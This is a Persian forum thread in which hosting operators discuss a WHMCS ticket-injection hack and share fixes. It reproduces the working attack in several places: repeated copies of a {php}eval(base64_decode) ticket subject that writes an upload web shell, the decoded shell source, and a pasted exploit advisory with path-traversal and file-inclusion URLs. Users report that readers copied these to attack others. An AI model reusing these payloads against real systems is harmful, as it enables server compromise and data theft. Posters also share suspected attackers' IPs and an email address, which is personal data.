هک شدن از طریق whmcs5

دوستانی که پچ کردن مشکلی ندارن
امروز چند نفر اومدن و سعی کردن که به سیستم ما نفوذ کنن ولی موفق نشدند
یکیشون ایمیل زد و عذرخواهی کرد و گفت که کد رو از اینجا برداشته !
WHMCS همیشه به محض انتشار patch، به تمامی کاربران اطلاع میده
اگر لایسنس ندارید، سعی کنید حتما تهیه کنید. بدون لایسنس ممکنه کل زحماتتون یک شبه به باد بره. باور کنید 19 دلار ماهانه، در مقابل از دست رفتن کل زحماتتون هیچی نیست. اگر قادر به پرداخت این پول نیستید، مطمئن باشید با کمی صرفه جویی میتونید این پول رو پرداخت کنید

---------- Post added at 07:52 PM ---------- Previous post was at 07:00 PM ----------

ضمنا دوستان میتونین از طریق بخش Spam Control متن کد رو بلاک کنید
اینطوری تیکتهایی که توسط افرادی که کد رو از اینجا کپی میکنن و روی سایت شما تست میکنن توسط سیستم بلاک میشه و موجب مزاحمت نمیشه
البته دقت کنید که برای رفع باگ باید سیستمتون رو پچ کنید، و این کار فقط برای جلوگیری از دریافت تیکتهای اینچنینی هستش

نقل قول:

---

نوشته اصلی توسط sardarn

امروز دو تا ایمیل برام اومده بود که سایت شما هک شده بود و اخطار داده بود که اطلاعات تون رو منتقل کنید که می خواد کلیه اطلاعات رو پاک کنه.به کاربرهاتون ایمیل اطلاع رسانی بفرستید که قضیه باگ هست .اسمش رو هم نوشته بود

---

سلام
دیشب پس از این عمل اطلاع رسانی شد:
http://portal.mbjhosting.org/

ممنون از شما.

دوستان اطلاعات کریدیت کارت در دیتا بیس whmcs ذخیره میشه؟ :((
در کدوم تیبل ذخیره میشه؟
اگه ممکنه یخورده زودتر جواب بدید:-ss
:63:

نقل قول:

---

نوشته اصلی توسط Mohammad_reza

همین کار با ما هم انجام شده
آی پی کاربری که اینکارو کرده اینه :

کد:

---

2.176.***.124

---

البته ما تیکت هایی که عنوان مناسب نداشته باشن رو نخونده پاک می کنیم اینم یکی از همون موارد ...

با تشکر از همه دوستان که تو این تاپیک شرکت کردن و ما رو راهنمایی کردن ، همچنین از استارتر بابت اطلاع رسانی ...

---

فرد هکر ناشی بوده و میتونید از ای پی بصورت کاملا رسمی شکایت کنید !این ای پی هم به ما اتک زده! مراحل ابیوز به سازمان مقررات شنبه طی میشه

امروز همچین تیکتی برای ما هم ارسال شد.
ولی ما قبلا نکات امنیتی رو رعایت کرده بودیم.
اون شخص از کشور اسرائیل لعنت الله علیه بود و هیچ غلطی نتونست بکنه. :))

نقل قول:

---

نوشته اصلی توسط itjavani

فرد هکر ناشی بوده و میتونید از ای پی بصورت کاملا رسمی شکایت کنید !این ای پی هم به ما اتک زده! مراحل ابیوز به سازمان مقررات شنبه طی میشه

---

نیاز به حمایت یا تأیید بود ، روی ما حساب کنید

نقل قول:

---

نوشته اصلی توسط noucamp

دوستان اطلاعات کریدیت کارت در دیتا بیس whmcs ذخیره میشه؟ :((
در کدوم تیبل ذخیره میشه؟
اگه ممکنه یخورده زودتر جواب بدید:-ss
:63:

---

از این مسیر برید:

Setup > Security > Disable Credit Card Storage

اگه دیسیبل باشه مشکلی نیست.

دقیقا این تاپیک شده دغدغه!
یاد گرفتن هر روز میاد با آی پی خود ایران تیکت میزنه و عنوانش رو کد شده میذاره هر چند که قبل از اینکه تیکت رو بخونیم محتوی اون را با ایمیل چک میکنیم
بهترین راه محدودیت در تعداد کارکتر عنوان هست

نقل قول:

---

نوشته اصلی توسط هاست 97

دقیقا این تاپیک شده دغدغه!
یاد گرفتن هر روز میاد با آی پی خود ایران تیکت میزنه و عنوانش رو کد شده میذاره هر چند که قبل از اینکه تیکت رو بخونیم محتوی اون را با ایمیل چک میکنیم
بهترین راه محدودیت در تعداد کارکتر عنوان هست

---

مطمئن باشید یک هکر حرفه ای چنین کاری نمیکنه و باز هم مطمئن باشید که اونایی که تیکت میزنن، کد رو از همین تاپیک برداشتن، یک نفر هم نیستند، چند نفرن، یک عده بچه که با دیدن این کد و این تاپیک فکر کردن دیگه هکر شدن
همونطور که در بالا گفتم، برای جلوگیری از دریافت این نوع تیکتها، بعد از اینکه پچ رو ریختید، کد رو در قسمت Spam Control بلاک کنید تا دیگه چنین تیکتهایی بدستتون نرسه

بله واقعا من از زدن این تیکت شدیدا ناراحتم
فکر کنم الان همه ایرانی ها هکر شدن
از مدیر میخوام تیکت رو حذف کنه
یا لااقل پست هایی که یه جورایی آموزش داده

اگه امنیتتون خوب باشه هیچ مشکلی پیش نمیاد.
بزارید اینقدر تیکت بزنن تا جر بخورن.
شما چرا اینقدر گندش کردین این قضیه رو آخه.
این تاپیک بهتره که به تاریخ پیوسته بشه.

با سلام
میدونم در حدی نیستم که بخام نظر بدم و این نظر، نظر شخصیه!
به نظر من کار خوبی میکنه هر کی هک کرده
چون طرف هیچ وقت نمیفهمید که سایتش باگ داره
بعدشم هاستینگ ها خودشون نسخه نال شده استفاده میکنند بعد که میرسه نوبت کاربرانشون میگن باید لایتکس بگیری خداییش این دیگه اخرشه
خدایی هرکی بوده دمش گرم

نقل قول:

---

نوشته اصلی توسط taranoome

با سلام میدونم در حدی نیستم که بخام نظر بدم و این نظر، نظر شخصیه! به نظر من کار خوبی میکنه هر کی هک کرده چون طرف هیچ وقت نمیفهمید که سایتش باگ داره بعدشم هاستینگ ها خودشون نسخه نال شده استفاده میکنند بعد که میرسه نوبت کاربرانشون میگن باید لایتکس بگیری خداییش این دیگه اخرشه خدایی هرکی بوده دمش گرم

---

اولا خیلی از دوستان لایسنس خریدند

دوما اگه هکر نیت مثبتی داره، میتونه به مدیریت اون وبسایت اعلام کنه که سیستمش باگ داره

تایید میکنم
من خودم اولین کسی بودم که فهمیدن این آپلودر کجا و چه طور باز میشه میتونید تاپیکو بینید اما با موبایل شخصیم به چندین شرکت تماس گرفتم و باگ رو گفتم
در ضمن کسی که واسه خود و مشتری هاش ارزش قائل باشه از نال استفاده نمیکنه

نقل قول:

---

نوشته اصلی توسط taranoome

با سلام
میدونم در حدی نیستم که بخام نظر بدم و این نظر، نظر شخصیه!
به نظر من کار خوبی میکنه هر کی هک کرده
چون طرف هیچ وقت نمیفهمید که سایتش باگ داره
بعدشم هاستینگ ها خودشون نسخه نال شده استفاده میکنند بعد که میرسه نوبت کاربرانشون میگن باید لایتکس بگیری خداییش این دیگه اخرشه
خدایی هرکی بوده دمش گرم

---

خیلی از سایت های خارجی و ایرانی که لایسنس داشتند نیز هک شده اند !

همکارانی که هک نشده اند هم می توانند شکایت کنند ؟

ولی 90 درصد اشخاصی بودند که نال شده استفاده کردند تا لایتکس

الان یه نفر تیکت داد

کاربر: hamid rahmati #16
بخش: بخش فروش
موضوع: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}

اهمیت: Medium

محتوای سوال

=============================
hi

----------------------------
IP Address: 46.19.139.252

نقل قول:

---

نوشته اصلی توسط maryam1

الان یه نفر تیکت داد

کاربر: hamid rahmati #16
بخش: بخش فروش
موضوع: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}

اهمیت: Medium

محتوای سوال

=============================
hi

----------------------------
IP Address: 46.19.139.252

---

خوب از بخش Spam Control متن کد رو بلاک کنید

هم باگ رفع شده
هم پوشه های دانلود و تمپلت و ... درد دسترس نیس
الان با آیپیش میتونم شکایت کنم؟
مشهدیه

---------- Post added at 06:09 PM ---------- Previous post was at 06:07 PM ----------

وای خدا این مشتریمه
الان کل هاست هاشو دلیت میزنم:-p

---------- Post added at 06:15 PM ---------- Previous post was at 06:09 PM ----------

takfile22@yahoo.com
اینم ایمیلش

نقل قول:

---

نوشته اصلی توسط maryam1

هم باگ رفع شده
هم پوشه های دانلود و تمپلت و ... درد دسترس نیس
الان با آیپیش میتونم شکایت کنم؟
مشهدیه

---------- Post added at 06:09 PM ---------- Previous post was at 06:07 PM ----------

وای خدا این مشتریمه
الان کل هاست هاشو دلیت میزنم:-p

---

جون شما گفتی مشهدیه فکر کنم همونیه که فکرش رو میکنم

---------- Post added at 06:21 PM ---------- Previous post was at 06:17 PM ----------

دوست من این نیست ببین خاسته شوخی بکنه باهات
به دل نگیر

بهتره یک تاپیک ایجاد بشه و آی پی و ایمیل هکران رو اعلام کنیم تا همه مسدود کنند

من که اعلام کردم الان نصف ایران هکر این سیستم هستند:((

عزیزم یه مسئله کوچیک رو این همه بزرگش که نمیکنند
اگه اون شخصم هکر باشه با ای پی واقعی وارد سیستم نمیشه بهتره جای این کارا باگای تو سیستمتون رو برطرف کنید دوستان عزیز
نه اینکه به فکر انتقام باشی

نتونست کاری کنه که باگ ها هم بر طرف شده
سیستمم هم لایسنس داره و خدا رو شکر من اولین نفری بودم که هک شدم و منو همون بچه ی عرب هک کرد
من یه اشتباه کردم اینجا تاپیک زدم و آموزش دادم که چه جوری عمل میکنه تا بچه ها باگو ببندن اما هر کی این تاپیکو خوند هکر شد
از مدیرا میخوام تاپیک حذف بشه
یا پست هایی که جوری آموزشیست

---------- Post added at 06:48 PM ---------- Previous post was at 06:44 PM ----------

الان همه هکر شدن شما چه طور؟

بنا به این که خیلی از دوستان ایرانی توسط این باگ هک میشن این اکسپلویت رو قرار میدم تا با توجه به اون مقابله بکنید:

کد:

---

$b0x#  WHMCS ( WHMCompleteSolution )  3.x / 4.x  Multiple Vulnerability !
$b0x#  ZxH-Labs
$b0x#  1st-NOV-11
$b0x#  Www.Sec4ever.coM
$b0x#  WH-03 On Windows IIS 6.0

========================================================
b0x@1337b0x:/b0x/Exploits/WebAPP# whoami
ZxH-Labs | Www.Sec4ever.coM
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.XPL

EXPL Type : Local File Disclosure
             
Files : Submitticket.php , Downloads.php

      -> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
            EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00

      ->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
            EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00


b0x@1337b0x:/b0x/Exploits/WebAPP#
b0x@1337b0x:/b0x/Exploits/WebAPP#  cat WH-03.bug

Bug TYPE : Local File Include
Bug File : Reports.php

            -I : reports.php?report=[LFI]%00
                EX : admin/reports.php?report=../../../../../../../boot.ini%00
           
              You Can Use This Bug When You Get Forbidden Access In Lux Symlink !
            However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be
                  -FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00
              And Don't Forget To Use IFRAME With Evil Code'z =))


b0x@1337b0x:/b0x/Exploits/WebAPP# Logout
========================================================
$b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever |  TNT_HACKER | r1z | Tw1st3r | S4S
Cyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN  | Th3MMA | FreeMan(LY) | Ma3stro_DZ
Mr.L4iv3  And All Q8'z

./b0x

---

------------------------------------
کل کدي که اينجکت ميشه در تيکت ها( با توجه به ارسال maryam1) اين هست:

کد:

---

<?php
$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
$fo = fopen("downloads/b0x.php","w");
fwrite($fo,$code);
?>

---

و $code عبارته از:

کد:

---

<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
        if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
        else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

---

با توجه به اين موارد ميتونيد جلوي مورد رو بگيريد.

بچه ها دارن خود کفا میشن تیکت اومده ولی کد فرق داره یه نفر دیکد کنه ببینه جدیده ؟

نقل قول:

---

کاربر: iiiii gggggg #77
بخش: بخش فروش
موضوع: {php}eval(base64_decode(' JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG NvZGUpOw=='));{/php}

---

من با whmcs کار نکردم اما اگر بی بی کد {php} رو غیر فعال بکنید فکر نکنم کسی بتونه کد پی اچ پی به این شکل رو ران بکنه.
دوستانی که استفاده کردن میتونن بگن.
=))خودکفا

نقل قول:

---

نوشته اصلی توسط mehrshad.ho

بهتره یک تاپیک ایجاد بشه و آی پی و ایمیل هکران رو اعلام کنیم تا همه مسدود کنند

---

متأستفانه بدلیل آی پی های داینامیک در فضای اینترنت ایران امکان چنین کاری میسر نیست ...

مسخره بازی بعضی ها در این انجمن گل کرده است ! :))
اقایون، خواهشا پا نشوید بیاید هی یوزر بسازید تیکت بزنید !
خوبه که باگ بسته شده باز هم .... ! وقعا زشت هست ....

ایپی مسدود شده : 31.7.61.22
که می دانم از کی هم سرویس گرفتی و به ITJavani گزارش خواهد شد . :53:

حال میکنم خدایی
امشب فکر کنم همه سر کار باشین تا صبح:))

دوستان یک راه چازه به همه شما می گوییم و خلاص ...
چه باگ بسته باشید چه نه بسته باشید یک فایل .htaccess بسازید و توش محدودیت ایپی بگذارید ( طبق اموزش امنیتی بخش 4 خود سایت )
حال این .htaccess را یکی داخل پوشه ادمین ، یکی داخل پوشه templates_c یکی داخل پوشه downloads قرار دهید.
حالا اگر هکر 50 تا شل هم تزریق کنه قادر نیست اجراش کنه ! البته من همان Patch را نصبکردم تا حالا بیش از 15 تا کاربر سعی کردن تو سیستم من نفوذ کنند که ناکام ماندن !
و 99% از همین تاپیک پا می شن میان ! وقعا زشته ...

بهترین کار انتقال سه پوشه ی
اتنشن
تمپلت سی
دانلودز
به قسمت قبل از لوکال
به همین راحتی دیگه عمرا هک هم نمیشید

نقل قول:

---

نوشته اصلی توسط maryam1

بهترین کار انتقال سه پوشه ی
اتنشن
تمپلت سی
دانلودز
به قسمت قبل از لوکال
به همین راحتی دیگه عمرا هک هم نمیشید

---

این که صحیح این راه هم میشه ...
اما مزاحمت های کاربران این انجمن و خارجی ها را چیکار کنیم که باعث خنده بعضی ها هم شده :

نقل قول:

---

نوشته اصلی توسط taranoome

حال میکنم خدایی
امشب فکر کنم همه سر کار باشین تا صبح:))

---

چرا هر کی یه چیز میگه ؟

نقل قول:

---

نوشته اصلی توسط mehrshad.ho

چرا هر کی یه چیز میگه ؟

---

چون هز دو راهش صحیح است !
اگر شما htaccess بسازی و ایپی را داخل محدود کنی هکر اگر شل هم بریزه نمی تواند اجرا کند !
اگر مانند دوستمان اون سه فایل پشت روت ببری شل اپلود میشود اما با چه ادرسی می خواهد اجرا کند ؟
و وقتی که Patch کنی همه اینها کشکه ! طرف میاد ثبت نام می کنه تیکت هم میزنه ! کارش نمیشه میره ....
فقط مزاحمتش برای ماست !

اگه امکان داره برای اینکه بی نظمی پیش نیاد یه تاپیک جامع بزنید و نتیجه گیری کنید

نقل قول:

---

نوشته اصلی توسط mehrshad.ho

اگه امکان داره برای اینکه بی نظمی پیش نیاد یه تاپیک جامع بزنید و نتیجه گیری کنید

---

ماشالله 200 تا تاپیک جامع زده شده است !
تنها کار لازم این است : Security Patch - WHMCS Forums
همین !

من فایل هارو جایگزیم کردم دیگه مشکلی نداره ؟

توجه کنید پچ رو علاوه بر جایی که whmcs را نصب کردید داخل پوشه incloud هم قرار بدید
و دوم انتقال سه پوشه به قبل از روت
ولا پرمیشن فایل configuration.php رو 444 بزارید.
دوما کد های زیر رو در فایل configuration.php بزارید:


$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";


به جای username، نام کاربری هاستتونو بزارید. و همچنین این سه تا فولدر رو از هاست خارج کنید و به مسیری که در بالا گفته شده منتقل کنید.